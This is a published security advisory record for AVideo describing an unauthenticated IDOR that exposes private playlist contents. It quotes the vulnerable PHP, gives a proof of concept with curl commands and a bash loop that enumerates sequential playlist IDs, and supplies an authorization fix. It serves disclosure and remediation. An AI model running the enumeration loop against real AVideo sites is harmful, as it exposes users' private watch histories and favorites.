{"id":"GHSA-75qq-68m8-pvfr","summary":"AVideo: Unauthenticated IDOR in playlistsVideos.json.php Exposes Private Playlist Contents","details":"## Summary\n\nThe `objects/playlistsVideos.json.php` endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including `watch_later` and `favorite` types) are correctly hidden from listing endpoints via `playlistsFromUser.json.php`, but their contents are directly accessible through this endpoint by providing the sequential integer `playlists_id` parameter.\n\n## Details\n\nThe endpoint at `objects/playlistsVideos.json.php` accepts a `playlists_id` parameter and directly calls `PlayList::getVideosFromPlaylist()` with no ownership or visibility validation:\n\n```php\n// objects/playlistsVideos.json.php:24-28\nif (empty($_REQUEST['playlists_id'])) {\n    die('Play List can not be empty');\n}\nrequire_once './playlist.php';\n$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);\n```\n\nThe `getVideosFromPlaylist()` method at `objects/playlist.php:588` performs a SQL query joining `playlists_has_videos`, `videos`, and `users` tables with no authorization filter:\n\n```php\n// objects/playlist.php:592-597\n$sql = \"SELECT v.*, p.*,v.created as cre, p.`order` as video_order  \"\n    . \" FROM  playlists_has_videos p \"\n    . \" LEFT JOIN videos as v ON videos_id = v.id \"\n    . \" LEFT JOIN users u ON u.id = v.users_id \"\n    . \" WHERE playlists_id = ? AND v.status != 'i' \";\n```\n\nIn contrast, the listing endpoint `playlistsFromUser.json.php` correctly enforces visibility at lines 23-27:\n\n```php\n// objects/playlistsFromUser.json.php:23-27\n$publicOnly = true;\nif (User::isLogged() && (User::getId() == $requestedUserId || User::isAdmin())) {\n    $publicOnly = false;\n}\n$row = PlayList::getAllFromUser($requestedUserId, $publicOnly);\n```\n\nThis creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The `.htaccess` rewrite at line 356 maps the clean URL `playListsVideos.json` to this endpoint.\n\n## PoC\n\n**Step 1: Enumerate playlist contents without authentication**\n\n```bash\n# No cookies or auth headers needed. Increment playlists_id to enumerate.\ncurl -s \"http://TARGET/objects/playlistsVideos.json.php?playlists_id=1\" | python3 -m json.tool\n```\n\nExpected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.\n\n**Step 2: Enumerate private playlists (watch_later, favorite)**\n\n```bash\n# Iterate through sequential IDs to find private playlists\nfor i in $(seq 1 50); do\n  result=$(curl -s \"http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i\")\n  count=$(echo \"$result\" | python3 -c \"import sys,json; print(len(json.load(sys.stdin)))\" 2\u003e/dev/null)\n  if [ \"$count\" != \"0\" ] && [ -n \"$count\" ]; then\n    echo \"Playlist $i: $count videos\"\n  fi\ndone\n```\n\n**Step 3: Confirm the listing endpoint correctly hides private playlists**\n\n```bash\n# This correctly returns only public playlists for user 1\ncurl -s \"http://TARGET/objects/playlistsFromUser.json.php?users_id=1\" | python3 -m json.tool\n# Compare: playlistsVideos.json.php returns contents of ALL playlists including private ones\n```\n\n## Impact\n\nAn unauthenticated attacker can:\n\n- **Enumerate all users' watch history** by accessing `watch_later` playlist contents\n- **Enumerate all users' favorites** by accessing `favorite` playlist contents\n- **Access unlisted/private custom playlists** that were intentionally hidden from public view\n- **Harvest video metadata** including filenames, URLs, user information, and comments for videos in private playlists\n\nThis is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.\n\n## Recommended Fix\n\nAdd authorization checks to `objects/playlistsVideos.json.php` before returning playlist contents:\n\n```php\n// objects/playlistsVideos.json.php — add after line 27, before getVideosFromPlaylist()\nrequire_once $global['systemRootPath'] . 'plugin/PlayLists/PlayLists.php';\n\n$pl = new PlayList($_REQUEST['playlists_id']);\n$plStatus = $pl-\u003egetStatus();\n\n// Public playlists are accessible to everyone\nif ($plStatus !== 'public') {\n    // Private, unlisted, watch_later, and favorite playlists require ownership or admin\n    if (!User::isLogged() || (User::getId() != $pl-\u003egetUsers_id() && !User::isAdmin())) {\n        header('HTTP/1.1 403 Forbidden');\n        die(json_encode(['error' =\u003e 'You do not have permission to view this playlist']));\n    }\n}\n\n$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);\n```","aliases":["CVE-2026-33759"],"modified":"2026-03-27T21:51:05.031595Z","published":"2026-03-26T18:05:40Z","database_specific":{"github_reviewed_at":"2026-03-26T18:05:40Z","nvd_published_at":"2026-03-27T15:16:58Z","cwe_ids":["CWE-639","CWE-862"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-75qq-68m8-pvfr"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33759"},{"type":"WEB","url":"https://github.com/WWBN/AVideo/commit/bb716fbece656c9fe39784f11e4e822b5867f1ca"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"26.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-75qq-68m8-pvfr/GHSA-75qq-68m8-pvfr.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}]}